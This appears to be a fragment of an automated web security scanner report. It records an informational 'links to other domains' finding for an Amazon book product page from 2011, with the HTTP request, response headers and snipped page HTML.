<img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" /><img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" />
</div>
...[SNIP]...
<td valign="top" class="faceout"><img src="http://ecx.images-amazon.com/images/I/51tfCjbRXJL._SL500_SS75_.jpg" width="50" alt="Silverlight 4 Jumpstart" height="50" border="0" /></td>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Action-Pete-Brown/dp/1935182374/ref=pd_cp_b_1_img" id="pd_cp_b_1_img_1935182374" ><img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Silverlight 4 in Action" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Microsoft-Silverlight-Step/dp/073563887X/ref=pd_cp_b_2_img" id="pd_cp_b_2_img_073563887X" ><img src="http://ecx.images-amazon.com/images/I/51ucwGaw5gL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Microsoft Silverlight 4 Step by Step (Step By Step (Microsoft))" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Foundation-Expression-Blend-4-Silverlight/dp/143022973X/ref=pd_cp_b_3_img" id="pd_cp_b_3_img_143022973X" ><img src="http://ecx.images-amazon.com/images/I/51lFeW7HogL._SL75_SS50_.jpg" width="50" alt="Foundation Expression Blend 4 with Silverlight" height="50" border="0" /></a>
...[SNIP]...
<div class="loading_ind" style="text-align: center; width: 100%; display: none;">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif" width="100" alt="Loading..." height="124" border="0" />
</div>
...[SNIP]...
<div class="loading_ind" style="display:none" width="100%">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif" style="padding:8px 0px 0px 100px" />
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div style="background-color:#eff7fe;border:1px solid #0f3c6d;padding:10px;text-align:left;" class="small">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif" width="1" align="left" height="1" border="0" />
<div name="hmdFormDiv" id="hmdFormDiv">
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />
    If you need help or have a question for Customer Service, <a href="/gp/help/customer/display.html/ref=cm_r8n_hmd_contact?ie=UTF8&amp;nodeId=518316">
...[SNIP]...
<td>
           
   
                                                               <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />&nbsp;Would you like to <b>
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />

Is there any other feedback you would like to provide?


    <b>
...[SNIP]...
<a href="/ref=footer_logo/178-7471219-5935264"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

22.375. http://www.amazon.com/gp/product/184968006X

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /gp/product/184968006X

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /gp/product/184968006X?ie=UTF8&tag=silverlightnet-20&linkCode=xm2&camp=1789&creativeASIN=184968006X HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:30:20 GMT
Server: Server
x-amz-id-1: 0XKECKNR6H60A6C1P2PC
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: CcVgt8Ki3aGDcInLSZrXm3lZNlBFSwvoguF5oYlAkL7M50lOj+5ROXGiGrpYAFMx
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=180-2237308-2659866; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=eHjsire/T0R7tdwagP8TcPZKxHTTNNEzlEP0ADU6p9fDKp0HUddz5FB1vK4SWFnhMc+scZ3m3MMvdOoMBY3JMfDMgo9VyMfPoh4njOXzH+BQw3FF7fbIOVZ2IDZk0zQNft3m03t/gL+Tvy3Fp+s+IAXdK6TUGa3MgVEkoCKmlXgie4ZhutN7WZcgnsC2goxBTpcCUomgvJOn1FOsZJdpvaOeWwE7d4VopLfVs94lsjI1refuYz4Fh3eO4sF0scjQpxW30YkQtgxE21eMEFTpM3qzTPbz2A4In7Bgd+9yov6kS3a2jmHTnaE+PhrTEqnDDXpdHgngmPdiaQgXuM6nGSPUPALmbdC5KPrDo93c5AVJkz34KeYRlhnIYDw9LgulDl/Iq7uP7A0bF2cLU4kNTRvZoGaE4G4BI5Ct3/CXQEOqN+ABdMJN/2U0eTeT5lbUCjHlpbF1b4Y=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:30:20 2011 GMT
Content-Length: 400270


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...
</style>


                <link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/fruitCSS/US-combined-1434113735.css._V175075384_.css" />


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/dpCSS/US/combined-3484246616._V196377856_.css" />


<noscript><link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" /></noscript>

<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/kitchen/scheduled-delivery/sd_style-v1.1.1.0._V200598425_.css"/>


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/accessoriesCSS/US-combined-2965960588.css._V172139020_.css" />


   <link rel="stylesheet" type="text/css" href=http://z-ecx.images-amazon.com/images/G/01/productAds/css/detailPageStatic._V175408788_.css />

<style type="text/css">
...[SNIP]...
</style>


<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5869551106.css._V171084207_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-4._V196325517_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/dpMergedOverallCSS/dpMergedOverallCSS-8314507502.css._V196183329_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/ciuCSS/ciuCSS-ciuAnnotations-155.css._V174809499_.css' rel='stylesheet'>
<style type="text/css">
...[SNIP]...
</title>

<link title="Amazon Search Suggestions" rel="search" type="application/opensearchdescription+xml" href="http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.DPIE.xml">


<!--[if IE]>
...[SNIP]...
</script>
<img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16piv._V172849515_.png" style="display:none" alt=""/>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" style="display:none" alt=""/>


<!--Pilu -->
...[SNIP]...
<div id="rwImages_hidden" style="display:none;">
<img src="http://ecx.images-amazon.com/images/I/412BbFUyhyL._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" style="display:none;"/>
</div>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableTop"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="subsDPTableLeft"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td class="subsDPTableRight"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableBottom"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<a href="https://www.amazon.com/gp/tradein/add-to-cart.html/ref=trade_new_dp_trade_btn?ie=UTF8&asin=184968006X"><img src="http://g-ecx.images-amazon.com/images/G/01/tradein/buttons/button_tradein_here._V192193387_.gif" width="84" align="absmiddle" height="17" border="0" /></a>
...[SNIP]...
<a href="/gp/reader/184968006X/ref=sib_dp_pt#reader-link" onclick="if (typeof(SitbReader) != 'undefined') { SitbReader.LightboxActions.openReader('sib_dp_pt'); return false; }"><img onload="if (typeof uet == 'function') { uet('af'); }" src="http://ecx.images-amazon.com/images/I/412BbFUyhyL._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" id="prodImage" width="300" height="300" onMouseOver="sitb_showLayer('bookpopover'); return false;" onMouseOut="sitb_doHide('bookpopover'); return false;" border="0" alt="Microsoft Silverlight 4 and SharePoint 2010 Integration" onmouseover="" /></a>
...[SNIP]...
<span>&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AB61b.sXYJbxeWIJELbZnZESLuA-XNUTx68MRbKXHzkfU9f3vMxh.8nowYKcRH0LEEodBduTSJ-sUU0LUszCDrNUtP0fUiDLeVgYIp2GqS8QCuyxD4fOe7nqUePAPEUJMQFfD.BP6Ky0CjrqjbhLoyZmsWwh0AgklsJmnw34UP50OiZOOpiBWC6GT5QF24QqhICdGxLDetUw-TBCU6mlWTmhJSkiKinGh37xU8DzrLj1nCPoLm-qm2inFeOHDhCfm5A4CsHnG8yWa6-YInoVJT9oHQmU7L8YQkcROlVofXo0a5rqZCPf5KMkrnHxlEqGiOGOLm2ful22zvfKpMNVgEE9J9uGzfQwWykj362LcVNZO5d5XXULhzW.yt9MfIMhXNhHDQkmIaGDGZtiz-cnMWvlCfegN084.q6IiRK4bFpkO2GEjUvfYoiV.AjDR8vFfEEu5OG4urRmSewijVG0XOJ2ldT.NXD08AHGpVqrY2A3Yz.7UhBsa-XCdbojgAopG.t0i0tlYJ2O&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AB61b.sXYJbxeWIJELbZnZESLuA-XNUTx68MRbKXHzkfU9f3vMxh.8nowYKcRH0LEEodBduTSJ-sUU0LUszCDrNUtP0fUiDLeVgYIp2GqS8QCuyxD4fOe7nqUePAPEUJMQFfD.BP6Ky0CjrqjbhLoyZmsWwh0AgklsJmnw34UP50OiZOOpiBWC6GT5QF24QqhICdGxLDetUw-TBCU6mlWTmhJSkiKinGh37xU8DzrLj1nCPoLm-qm2inFeOHDhCfm5A4CsHnG8yWa6-YInoVJT9oHQmU7L8YQkcROlVofXo0a5rqZCPf5KMkrnHxlEqGiOGOLm2ful22zvfKpMNVgEE9J9uGzfQwWykj362LcVNZO5d5XXULhzW.yt9MfIMhXNhHDQkmIaGDGZtiz-cnMWvlCfegN084.q6IiRK4bFpkO2GEjUvfYoiV.AjDR8vFfEEu5OG4urRmSewijVG0XOJ2ldT.NXD08AHGpVqrY2A3Yz.7UhBsa-XCdbojgAopG.t0i0tlYJ2O&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AB61b.sXYJbxeWIJELbZnZESLuA-XNUTx68MRbKXHzkfU9f3vMxh.8nowYKcRH0LEEodBduTSJ-sUU0LUszCDrNUtP0fUiDLeVgYIp2GqS8QCuyxD4fOe7nqUePAPEUJMQFfD.BP6Ky0CjrqjbhLoyZmsWwh0AgklsJmnw34UP50OiZOOpiBWC6GT5QF24QqhICdGxLDetUw-TBCU6mlWTmhJSkiKinGh37xU8DzrLj1nCPoLm-qm2inFeOHDhCfm5A4CsHnG8yWa6-YInoVJT9oHQmU7L8YQkcROlVofXo0a5rqZCPf5KMkrnHxlEqGiOGOLm2ful22zvfKpMNVgEE9J9uGzfQwWykj362LcVNZO5d5XXULhzW.yt9MfIMhXNhHDQkmIaGDGZtiz-cnMWvlCfegN084.q6IiRK4bFpkO2GEjUvfYoiV.AjDR8vFfEEu5OG4urRmSewijVG0XOJ2ldT.NXD08AHGpVqrY2A3Yz.7UhBsa-XCdbojgAopG.t0i0tlYJ2O&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.trigent.com</a>
...[SNIP]...
<span>&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AMjkcXpTc-N.deHKmltxM9hVdjUnO0HHMm6vPE-ZSPMJFdAqR276O2xHTYS7l5N0SYKpLeXWq00BRNQiL0mniigtj3xUFs3kigdGOWX7NnSGm87ulimjYAAM17Xg4TAwYIj6r4HShPjyLT5J1WRkdzBKQRuGKH8e1LdkbKOSnjpYQlz.-DfDLAjt9M1QmiFhhPot2rx.nP5ocuw5SmY2YUHh4rmN5.M66zfZqWTH6Dp5HjVmGssM-VintWmYgd6BiXCZaZavf9J1CZ4xcofpew108T4WVpwBSGLEdwW4Zo4F2rL.WhzWbMCOcgXnMoIZMukHKu7eN8dopWcK5MN4SxO0kNz798oB-SL4uOtgEjITiKSSLTtLzAL5QPq90vtB-CkB5Pd40RhdmWa9qi.fbpWoAZ8OtNWBeHJLVwCaYYDn01WnpbBjhzAQJnBFxjob5Q__&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AMjkcXpTc-N.deHKmltxM9hVdjUnO0HHMm6vPE-ZSPMJFdAqR276O2xHTYS7l5N0SYKpLeXWq00BRNQiL0mniigtj3xUFs3kigdGOWX7NnSGm87ulimjYAAM17Xg4TAwYIj6r4HShPjyLT5J1WRkdzBKQRuGKH8e1LdkbKOSnjpYQlz.-DfDLAjt9M1QmiFhhPot2rx.nP5ocuw5SmY2YUHh4rmN5.M66zfZqWTH6Dp5HjVmGssM-VintWmYgd6BiXCZaZavf9J1CZ4xcofpew108T4WVpwBSGLEdwW4Zo4F2rL.WhzWbMCOcgXnMoIZMukHKu7eN8dopWcK5MN4SxO0kNz798oB-SL4uOtgEjITiKSSLTtLzAL5QPq90vtB-CkB5Pd40RhdmWa9qi.fbpWoAZ8OtNWBeHJLVwCaYYDn01WnpbBjhzAQJnBFxjob5Q__&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AMjkcXpTc-N.deHKmltxM9hVdjUnO0HHMm6vPE-ZSPMJFdAqR276O2xHTYS7l5N0SYKpLeXWq00BRNQiL0mniigtj3xUFs3kigdGOWX7NnSGm87ulimjYAAM17Xg4TAwYIj6r4HShPjyLT5J1WRkdzBKQRuGKH8e1LdkbKOSnjpYQlz.-DfDLAjt9M1QmiFhhPot2rx.nP5ocuw5SmY2YUHh4rmN5.M66zfZqWTH6Dp5HjVmGssM-VintWmYgd6BiXCZaZavf9J1CZ4xcofpew108T4WVpwBSGLEdwW4Zo4F2rL.WhzWbMCOcgXnMoIZMukHKu7eN8dopWcK5MN4SxO0kNz798oB-SL4uOtgEjITiKSSLTtLzAL5QPq90vtB-CkB5Pd40RhdmWa9qi.fbpWoAZ8OtNWBeHJLVwCaYYDn01WnpbBjhzAQJnBFxjob5Q__&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.appdev.com</a>
...[SNIP]...
<span>&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AJAPTFXtd2ytU8-C3BCqIn5nVG4PqakXovUXy0SEIgBme8uiD9zCrBiiAUoYZNnjhtIoHU7eYs6fIvK92XFvGPMX8gEy.Fqwl0id7PiMkpAzY9w0-dVyVcyNd.TBRxIxb3BWp-o7-VDZNGpeob-jpteaoc6XZ6wYhF-sOvDHNGSDRpQVuJA0BSwTCg49gIut9GC6m4ek1HJ5CsNTzAUrQs16rZZDyXezq12UmHIQzoNoXGb2.mDmWcgFogGKH9QOUD6i9XosVwhy5p4jlrpbamhxI0BK.XH7VlHKYJXAlvUxSP1dVfRb5HXfStlsgqSt7aAvkOliqAu4yqH3YvdJRwLt1e2oTxDF525Gg7.GPuNj-vg1btcWdoBngP547ewEZkTjWgruzvWxpE3iqAq3v7z-vzVa2KolU7cyPaOfaWUMpD7B7qlH2U6Vr2y8dXmumWAlDrVAWBjP3VAJzGNKXFJPV8xITT4U848cSv5tBfi99arV3tun.rvlaxUhYDZ69uolpqApuq2eYBoh.Hdf0VzN4zLLi6MJoPcJ1WzCJb48TX3lHOhyakPtQu1ouH99CX3qUK41.uPdHu4Z4AS6h1mqspA-fcerpQ__&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AJAPTFXtd2ytU8-C3BCqIn5nVG4PqakXovUXy0SEIgBme8uiD9zCrBiiAUoYZNnjhtIoHU7eYs6fIvK92XFvGPMX8gEy.Fqwl0id7PiMkpAzY9w0-dVyVcyNd.TBRxIxb3BWp-o7-VDZNGpeob-jpteaoc6XZ6wYhF-sOvDHNGSDRpQVuJA0BSwTCg49gIut9GC6m4ek1HJ5CsNTzAUrQs16rZZDyXezq12UmHIQzoNoXGb2.mDmWcgFogGKH9QOUD6i9XosVwhy5p4jlrpbamhxI0BK.XH7VlHKYJXAlvUxSP1dVfRb5HXfStlsgqSt7aAvkOliqAu4yqH3YvdJRwLt1e2oTxDF525Gg7.GPuNj-vg1btcWdoBngP547ewEZkTjWgruzvWxpE3iqAq3v7z-vzVa2KolU7cyPaOfaWUMpD7B7qlH2U6Vr2y8dXmumWAlDrVAWBjP3VAJzGNKXFJPV8xITT4U848cSv5tBfi99arV3tun.rvlaxUhYDZ69uolpqApuq2eYBoh.Hdf0VzN4zLLi6MJoPcJ1WzCJb48TX3lHOhyakPtQu1ouH99CX3qUK41.uPdHu4Z4AS6h1mqspA-fcerpQ__&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AJAPTFXtd2ytU8-C3BCqIn5nVG4PqakXovUXy0SEIgBme8uiD9zCrBiiAUoYZNnjhtIoHU7eYs6fIvK92XFvGPMX8gEy.Fqwl0id7PiMkpAzY9w0-dVyVcyNd.TBRxIxb3BWp-o7-VDZNGpeob-jpteaoc6XZ6wYhF-sOvDHNGSDRpQVuJA0BSwTCg49gIut9GC6m4ek1HJ5CsNTzAUrQs16rZZDyXezq12UmHIQzoNoXGb2.mDmWcgFogGKH9QOUD6i9XosVwhy5p4jlrpbamhxI0BK.XH7VlHKYJXAlvUxSP1dVfRb5HXfStlsgqSt7aAvkOliqAu4yqH3YvdJRwLt1e2oTxDF525Gg7.GPuNj-vg1btcWdoBngP547ewEZkTjWgruzvWxpE3iqAq3v7z-vzVa2KolU7cyPaOfaWUMpD7B7qlH2U6Vr2y8dXmumWAlDrVAWBjP3VAJzGNKXFJPV8xITT4U848cSv5tBfi99arV3tun.rvlaxUhYDZ69uolpqApuq2eYBoh.Hdf0VzN4zLLi6MJoPcJ1WzCJb48TX3lHOhyakPtQu1ouH99CX3qUK41.uPdHu4Z4AS6h1mqspA-fcerpQ__&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.networkautomation.com</a>
...[SNIP]...
<a href="http://www.amazon.com/Microsoft-Silverlight-SharePoint-2010-Integration/dp/184968006X/ref=pd_bxgy_b_img_a"><img src="http://ecx.images-amazon.com/images/I/412BbFUyhyL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="75" alt="Microsoft Silverlight 4 and SharePoint 2010 Integration" id="bxgy_img_a" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/SharePoint-Development-Visual-Studio-Microsoft/dp/0321718313/ref=pd_bxgy_b_img_b"><img src="http://ecx.images-amazon.com/images/I/51j5pqB8cxL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="SharePoint 2010 Development with Visual Studio 2010 (Microsoft .NET Development Series)" id="bxgy_img_b" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Microsoft-SharePoint-2010-Solutions-Professionals/dp/1430228652/ref=pd_bxgy_b_img_c"><img src="http://ecx.images-amazon.com/images/I/514bKibhb7L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Microsoft SharePoint 2010: Building Solutions for SharePoint 2010 (Books for Professionals by Professionals)" id="bxgy_img_c" height="75" border="0" /></a>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/514bKibhb7L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51j5pqB8cxL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51iRGOliXtL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41kH6%2BdrJKL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51gaT-e4LjL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51yNm0-0X1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div style="display: none" class="CustomerPopover_load"><img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif" width="73" alt="Loading&hellip;" height="14" border="0" /></div>
...[SNIP]...
<noscript>
<link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" />
</noscript>
...[SNIP]...
</div>

<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif" width="1" alt="" onload="if (typeof uet == 'function') { uet('cf'); }" height="1" border="0" />

<br />
...[SNIP]...
<div style="display:none;" id="cg-div">
<img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" /><img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" />
</div>
...[SNIP]...
<div class="s9DpEntity" id="s9DpEntity" style="height: 200px;"><img style='padding-left: 130px; padding-top: 20px;' src='http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif' alt='loading' /><noscript>
...[SNIP]...
<td valign="top" class="faceout"><img src="http://ecx.images-amazon.com/images/I/412BbFUyhyL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="50" alt="Microsoft Silverlight 4 and SharePoint 2010 Integration" height="50" border="0" /></td>
...[SNIP]...
<a href="http://www.amazon.com/SharePoint-Development-Visual-Studio-Microsoft/dp/0321718313/ref=pd_cp_b_1_img" id="pd_cp_b_1_img_0321718313" ><img src="http://ecx.images-amazon.com/images/I/51j5pqB8cxL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="SharePoint 2010 Development with Visual Studio 2010 (Microsoft .NET Development Series)" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Professional-SharePoint-Branding-Interface-Programmer/dp/0470584645/ref=pd_cp_b_2_img" id="pd_cp_b_2_img_0470584645" ><img src="http://ecx.images-amazon.com/images/I/51iRGOliXtL._SL75_SS50_.jpg" width="50" alt="Professional SharePoint 2010 Branding and User Interface Design (Wrox Programmer to Programmer)" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Action-Pete-Brown/dp/1935182374/ref=pd_cp_b_3_img" id="pd_cp_b_3_img_1935182374" ><img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Silverlight 4 in Action" height="50" border="0" /></a>
...[SNIP]...
<div class="loading_ind" style="text-align: center; width: 100%; display: none;">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif" width="100" alt="Loading..." height="124" border="0" />
</div>
...[SNIP]...
<div class="loading_ind" style="display:none" width="100%">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif" style="padding:8px 0px 0px 100px" />
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div style="background-color:#eff7fe;border:1px solid #0f3c6d;padding:10px;text-align:left;" class="small">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif" width="1" align="left" height="1" border="0" />
<div name="hmdFormDiv" id="hmdFormDiv">
...[SNIP]...
<td>
